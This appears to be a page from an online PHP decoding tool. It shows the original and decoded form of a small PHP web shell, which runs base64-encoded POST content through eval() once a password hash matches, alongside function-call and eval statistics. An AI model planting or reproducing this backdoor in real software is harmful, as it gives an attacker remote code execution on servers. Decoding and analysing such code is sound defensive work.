Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php echo"trest";error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '6..
Decoded Output download
trestabrval
Did this file decode correctly?
Original Code
<?php
echo"trest";error_reporting(0);
if(isset($_POST['com']) && md5($_POST['com']) == '66d18dc9cbd1b87d4460a2ce37d8e835' && isset($_POST['content'])) $kk = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($kk));
echo"abrval";
?>
Function Calls
md5 | 1 |
base64_decode | 1 |
error_reporting | 1 |
Stats
MD5 | 2b872201f9f17abc4a170bd152c0e41e |
Eval Count | 1 |
Decode Time | 154 ms |